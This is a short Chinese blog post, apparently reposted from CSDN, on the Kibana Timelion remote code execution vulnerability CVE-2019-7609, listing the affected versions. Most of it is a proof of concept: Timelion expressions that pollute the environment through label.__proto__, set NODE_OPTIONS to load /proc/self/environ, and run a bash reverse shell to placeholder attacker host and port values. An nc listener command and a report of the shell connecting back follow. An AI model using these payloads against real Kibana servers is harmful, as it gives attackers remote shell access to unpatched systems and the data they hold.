Kibana远程代码执行漏洞(CVE-2019-7609)

Kibana远程代码执行漏洞(CVE-2019-7609)

漏洞简介

2019年2月官方发布公告称Kibana存在远程代码执行漏洞,5.6.15 和 6.6.1之前的 Kibana 版本在 Timelion 可视化工具中存在功能缺陷,导致攻击者可在服务器上利用Kibana执行任意代码。Kibana 是 Elasticsearch 的开源数据可视化插件。它为Elasticsearch提供可视化功能,可以用来搜索和查看存储在Elasticsearch索引中的数据,并可以将数据以各种图标、表格和地图的形式进行可视化展示。由于其功能的便利性,在产品研发中应用较为广泛。

影响范围

受影响版本
Kibana < 5.6.15 Kibana < 6.6.1
不受影响版本
Kibana = 5.6.15 Kibana >= 6.6.1

POC

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash - c \'bash -i>& /dev/tcp/You_VPS/You_VPS_Port 0>&1\'");//') ```
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/You_VPS/You_VPS_Port 0>&1");process.exit()//') ```
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

漏洞复现

在攻击机使用nc监听

nc -nvlp 1234

找到未授权页面执行shell
在这里插入图片描述
反弹成功
在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_44146996/article/details/110092623